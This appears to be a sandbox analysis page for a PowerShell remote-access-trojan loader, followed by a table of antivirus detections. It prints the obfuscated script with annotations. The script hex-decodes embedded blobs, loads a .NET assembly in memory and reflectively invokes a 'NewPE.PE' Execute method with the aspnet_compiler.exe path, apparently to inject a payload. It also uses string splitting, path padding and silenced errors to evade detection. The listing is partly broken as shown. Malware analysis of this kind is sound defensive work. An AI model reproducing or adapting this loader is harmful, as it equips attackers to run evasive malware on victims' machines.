Static | ZeroBOX
No static analysis available.
#mY cODER 3LOSH RAT ::::::
# Helper: decodes a string of '0'/'1' characters into ASCII text.
# Each 8-character slice is parsed as a base-2 number into one byte, and the
# collected bytes are returned as an ASCII string. Further down the script
# calls it to keep two short strings out of plain text.
# NOTE(review): the closing braces of the loop and of the function are missing
# from this listing, so the sample does not parse as shown.
Function Here([String] $EYUHSBH3567574JN3532434765675723426869797097957547464356457654686789768970456456464) {
# Accumulator for the decoded bytes.
$JN5634646756797897890456745643635353535565676978979678574563523534564675785678 = [System.Collections.Generic.List[Byte]]::new()
# Step through the input 8 characters (one byte) at a time.
for ($i = 0; $i -lt $EYUHSBH3567574JN3532434765675723426869797097957547464356457654686789768970456456464.Length; $i +=8) {
# No length check: Substring throws if fewer than 8 characters remain.
$JN5634646756797897890456745643635353535565676978979678574563523534564675785678.Add([Convert]::ToByte($EYUHSBH3567574JN3532434765675723426869797097957547464356457654686789768970456456464.Substring($i, 8), 2))
return [System.Text.Encoding]::ASCII.GetString($JN5634646756797897890456745643635353535565676978979678574563523534564675785678.ToArray())
# Helper: converts a hex string into a sequence of integers, one per
# two-character pair. The callers below cast the output to [byte[]].
# NOTE(review): the closing braces of the loop and of the function are missing
# from this listing.
function ReturnShellAlosh {
param($Alosh)
# -split with a capturing group '(..)' emits every two-character pair as its own
# element; the Where-Object filter (?) drops the empty strings left between them.
$Alosh = $Alosh -split '(..)' | ? { $_ }
ForEach ($J46342423DF34253W245GF3WV52V25322353532V534V65V36B36B3BV63BV3475BN5V6G23C525235CX23C52352V35B21365BV3463V56345V345345364V5764574N74VG543 in $Alosh){
# Parse the pair as base 16 and write the value to the pipeline (no explicit return).
[Convert]::ToInt32($J46342423DF34253W245GF3WV52V25322353532V534V65V36B36B3BV63BV3475BN5V6G23C525235CX23C52352V35B21365BV3463V56345V345345364V5764574N74VG543,16)
$IKGUJ43K2UJ42K3J423KJ423K45G25G35K3J5G34KJG63KJ6G3KJ76G4KJ7G654K7J4J6G32K45F2K5423F4G2342GF4D23HGC4R2R234C32G42J4C21J342H523C456CH252M465C24MH6M23H46525G2F5423G4D12G4D1N432142C5MN3C4M56H356M357643H7636346H356J34H56F34MH6536V3HM6H3M6VH363MV653MVH636VH365M3HV45H235M321V54H235V12M3V5243534M5V3HHMV23V6H23V632M6M236VM2H6VM2HV65M2HV624M6MH24V6V2MH46VMH2462MH4VM26H4VM62H4V6M24HV2M4HM5V3HV54M1H24VMH124VMH124VMH324HVM6345VM76H46VHM7HV4M6HVM436523M52M54MV2V5H2M3VH23MVH5VM23H5V2M5M25MV235 = '4D5@9OOOO3OOOOOOO4OOOOOOFFFFOOOOB8OOOOOOOOOOOOOO4OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO8OOOOOOOOE!FB@OEOOB4O9CD2!B8O!4CCD2!546869732O7O726F67726!6D2O636!6E6E6F742O62652O72756E2O696E2O444F532O6D6F64652EODODO@24OOOOOOOOOOOOOO5O45OOOO4CO!O3OO!3E2!964OOOOOOOOOOOOOOOOEOOOO2O!OBO!O8OOOOF8OOOOOOO@OOOOOOOOOOOO7E!7O!OOOO2OOOOOOO2OO!OOOOOO4OOOOO2OOOOOOOO2OOOOO4OOOOOOOOOOOOOOO4OOOOOOOOOOOOOOOO6OO!OOOOO2OOOOOOOOOOOOO2OO6O85OOOO!OOOOO!OOOOOOOOO!OOOOO!OOOOOOOOOOOOO!OOOOOOOOOOOOOOOOOOOOOOO3O!7O!OO4BOOOOOOOO2OO!OOF
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
# Loader stage. Two hex blobs are turned into byte arrays, one is loaded as a
# .NET assembly in memory, and a static method of that assembly is invoked with
# a path to a signed Microsoft binary plus the other blob.
# NOTE(review): the try/catch structure is damaged in this listing (bare "try"
# lines without braces, "} catch { }" without a visible opening), so it does
# not parse as shown. Every catch body is empty, which suppresses all errors.
# Indicators visible here for triage: Assembly.Load on an in-memory byte array,
# a type name assembled from string fragments, a '^^'-padded path to
# aspnet_compiler.exe, and reflection-based Invoke.
#
# First blob: the string literal assigned above, hex-decoded to bytes.
# NOTE(review): that literal begins '4D5@9OOOO3', which is not valid hex as shown;
# presumably a character substitution is reversed in the part of the listing that
# was removed before this line — confirm against the original sample.
[byte[]]$NB436457568567923421432433454G546KJ76KL47BHJ45K7H4LK57H5L4KH4LK57H465KL7BH4KL7BH34K6B3B6JL346N6K34N5KLBNKB3 = ReturnShellAlosh $IKGUJ43K2UJ42K3J423KJ423K45G25G35K3J5G34KJG63KJ6G3KJ76G4KJ7G654K7J4J6G32K45F2K5423F4G2342GF4D23HGC4R2R234C32G42J4C21J342H523C456CH252M465C24MH6M23H46525G2F5423G4D12G4D1N432142C5MN3C4M56H356M357643H7636346H356J34H56F34MH6536V3HM6H3M6VH363MV653MVH636VH365M3HV45H235M321V54H235V12M3V5243534M5V3HHMV23V6H23V632M6M236VM2H6VM2HV65M2HV624M6MH24V6V2MH46VMH2462MH4VM26H4VM62H4V6M24HV2M4HM5V3HV54M1H24VMH124VMH124VMH324HVM6345VM76H46VHM7HV4M6HVM436523M52M54MV2V5H2M3VH23MVH5VM23H5V2M5M25MV235
# Second blob: its source variable ($UI342...) is not assigned anywhere in the
# visible listing. This is the array passed to Assembly.Load below.
[byte[]]$H2342536JKL63K4J56GL3K4JG653LKH6346HHJKH5LBB242D4D23G4D2G3423N423NG4234N23452N3G42N3G423N432N = ReturnShellAlosh $UI342GFSFZ23F42NFX2JFX4J2H34F2J3F42JH52F5JH2XX5F2JH5F2HJ5F2HJ5F2JH5F2HJ6F23JH6F3H6FH3X6F3H6F2HJ65XFH12X5FHJ14XFHJ13F1313F1HJ34F2F45235F3H6HF36J36F36X5FH3J6536Y35X763673FH252FJ5XF2HX5F2H5F2H5F2H5XF23525XM25HFM25FM25F2MF523H52H352F5XMF2H5HFM52X3MFHX253HFM2X53HFM2XMHF6326XMHF4MFH24X66H4F2XMH64M32FMF634MF36XHM36FXF36MHF36C4
# '^' is replaced by '0' and the bit string decoded by Here(); the result is "Execute".
$L5333J3G3GG5KU45G3K4U53453UK535KKKKKUK5KU5K53UK5Y3K5UY345UKK431KU31KU21Y123U13U123UK1Y3U1YK412K412K44KU124124K1U241UK4K4UUK412K414K1UBKKB5KB512KU5B12KU5B12UK5KU5B23U5K23G5235KGKUGKU1G451KU24G1KU4GKU125GK1U5G1KU5G61UK6G21365GU5154K14G1KU4G1KU4G1KU5G1KU5G1UK5G1U2K5G15G12K5U12G4KU124GK1U11 = (Here("^1^^^1^1^1111^^^^11^^1^1^11^^^11^111^1^1^111^1^^^11^^1^1".Replace('^','0')))
# Same trick with '^' standing for '1'; the result is "Invoke".
$R2323G2DJKU4TG523KU42UK55YTGKUD245GTKU25G32K4U5UK56GK32U5GK2U5G23IL5K2G352KU5G23U5GKU253 = (Here("0^00^00^0^^0^^^00^^^0^^00^^0^^^^0^^0^0^^0^^00^0^".Replace('^','1')))
# Path to aspnet_compiler.exe in the .NET Framework v4.0.30319 directory, padded
# with '^^' so the plain path does not appear in the script text.
$S4645687568235SDF23534575686578653252424234536475678568462342341231312434563456467567546 = 'C:\Wi^^nd^^ows\Mi^^cro^^soft.NET\Frame^^work\v4.0.30319\asp^^net_com^^pi^^ler.^^e^^x^^e'
# The type is held in a variable so that "[System.Reflection.Assembly]::Load" is not written as one token.
$A45KLHK435435H3K5H4G543HK5G3K5G34KJ53K4J532KJ452JK52KJ342KJ34G23J4G2J3K423KJ4G2KJ34K2J34G2KJ34G2KJ423K52KJ65G23J5G2KJ5GKJ367GKJ47JK67G546JKGJK52KJ34G2KJ4G2KJ4G2JK5G34KJ6G3J67KG3JK6G2K3J5G2KJ3G52JK653GJK6743J7KK4J676474 = [System.Reflection.Assembly]
# Loads the second blob as an assembly from memory; nothing is written to disk by this call.
$ncrx3 = $A45KLHK435435H3K5H4G543HK5G3K5G34KJ53K4J532KJ452JK52KJ342KJ34G23J4G2J3K423KJ4G2KJ34K2J34G2KJ34G2KJ423K52KJ65G23J5G2KJ5GKJ367GKJ47JK67G546JKGJK52KJ34G2KJ4G2KJ4G2JK5G34KJ6G3J67KG3JK6G2K3J5G2KJ3G52JK653GJK6743J7KK4J676474::Load(($H2342536JKL63K4J56GL3K4JG653LKH6346HHJKH5LBB242D4D23G4D2G3423N423NG4234N23452N3G42N3G423N432N))
} catch { }
try
# The concatenated fragments form the type name "NewPE.PE".
$J4353647567424235475765869823423423E5345634634E6Y74557435E6B66BH346346B34563BN634N = $ncrx3.GetType('N' +'e' +'wP' +'E.PE');
# Looks up the method whose name was decoded above ("Execute") on that type.
$SE4574R5746723423547644R6JTF567474632453568UIR5 = $J4353647567424235475765869823423423E5345634634E6Y74557435E6B66BH346346B34563BN634N.'GetMethod'($L5333J3G3GG5KU45G3K4U53453UK535KKKKKUK5KU5K53UK5Y3K5UY345UKK431KU31KU21Y123U13U123UK1Y3U1YK412K412K44KU124124K1U241UK4K4UUK412K414K1UBKKB5KB512KU5B12KU5B12UK5KU5B23U5K23G5235KGKUGKU1G451KU24G1KU4GKU125GK1U5G1KU5G61UK6G21365GU5154K14G1KU4G1KU4G1KU5G1KU5G1UK5G1U2K5G15G12K5U12G4KU124GK1U11);
} catch { }
try
# Strips the '^^' padding, leaving the real aspnet_compiler.exe path.
$O3452312AWCGHJ4G2H4G2JMGC4GCAK4GAK24JGAKG4KJ24CGA2KJ42JG4KC4K2KGJ4CAKJ4GCCKJ24K2J4JG42GJ42JKG4C2KGJC42JKGC42JKG4C2KJGC4KJ24KGJJKG4G4KJ2KGJ42KGJ442KJC4K2GJCA4KGJCAK4GJAKGJAKKGACKGAC42GKJACKJKJAKGJAC42KAC42KGJCA42KGJAC24KGJACKGAJCGCJKC52JKC5KJAK53GJKGJC5K6GJC4A64SGJSG6J4A = $S4645687568235SDF23534575686578653252424234536475678568462342341231312434563456467567546.Replace("^^", "")
# Argument array for the call: (path to aspnet_compiler.exe, first blob's bytes).
$S3SG4353466785985854684322352354364897689067895346356363746785 = [object[]]($O3452312AWCGHJ4G2H4G2JMGC4GCAK4GAK24JGAKG4KJ24CGA2KJ42JG4KC4K2KGJ4CAKJ4GCCKJ24K2J4JG42GJ42JKG4C2KGJC42JKGC42JKG4C2KJGC4KJ24KGJJKG4G4KJ2KGJ42KGJ442KJC4K2GJCA4KGJCAK4GJAKGJAKKGACKGAC42GKJACKJKJAKGJAC42KAC42KGJCA42KGJAC24KGJACKGAJCGCJKC52JKC5KJAK53GJKGJC5K6GJC4A64SGJSG6J4A, $NB436457568567923421432433454G546KJ76KL47BHJ45K7H4LK57H5L4KH4LK57H465KL7BH4KL7BH34K6B3B6JL346N6K34N5KLBNKB3)
# Calls the static method ($null target) through the member named by the decoded "Invoke" string.
# NOTE(review): the method body is inside the loaded assembly and not visible here;
# passing a host executable path together with a byte blob presumably means the
# blob is run inside a newly started aspnet_compiler.exe process — confirm by
# analysing the assembly. An aspnet_compiler.exe process with a PowerShell parent
# is worth alerting on.
$SE4574R5746723423547644R6JTF567474632453568UIR5.$R2323G2DJKU4TG523KU42UK55YTGKUD245GTKU25G32K4U5UK56GK32U5GK2U5G23IL5K2G352KU5G23U5GKU253.Invoke($null, $S3SG4353466785985854684322352354364897689067895346356363746785)
} catch { }
} catch { }
Antivirus Signature
Bkav Clean
Lionic Clean
DrWeb Clean
ClamAV Clean
FireEye Heur.BZC.PZQ.Pantera.140.751818AF
CAT-QuickHeal Clean
Skyhigh Clean
ALYac Heur.BZC.PZQ.Pantera.140.751818AF
Malwarebytes Clean
VIPRE Heur.BZC.PZQ.Pantera.140.751818AF
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
BitDefenderTheta Clean
VirIT Clean
Symantec Backdoor.ASync!gm
ESET-NOD32 MSIL/Agent.CFQ
TrendMicro-HouseCall Clean
Avast Script:SNH-gen [Trj]
Cynet Clean
Kaspersky HEUR:Trojan.PowerShell.Kryptik.gen
BitDefender Heur.BZC.PZQ.Pantera.140.751818AF
NANO-Antivirus Clean
ViRobot HTML.Z.Agent.226446
MicroWorld-eScan Heur.BZC.PZQ.Pantera.140.751818AF
Rising Clean
Sophos Clean
F-Secure Clean
Baidu Clean
Zillya Clean
TrendMicro Clean
CMC Clean
Emsisoft Heur.BZC.PZQ.Pantera.140.751818AF (B)
GData Heur.BZC.PZQ.Pantera.140.751818AF
Varist ABRisk.XPMM-6
Avira Clean
MAX malware (ai score=83)
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Heur.BZC.PZQ.Pantera.140.751818AF
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan.PowerShell.Kryptik.gen
Microsoft Trojan:Win32/Znyonm
Google Detected
AhnLab-V3 Clean
Acronis Clean
VBA32 Clean
TACHYON Clean
Zoner Clean
Tencent Win32.Trojan.Kryptik.Jajl
Yandex Clean
Ikarus Trojan.MSIL.Agent
MaxSecure Clean
Fortinet Clean
AVG Script:SNH-gen [Trj]
Panda Clean
No IRMA results available.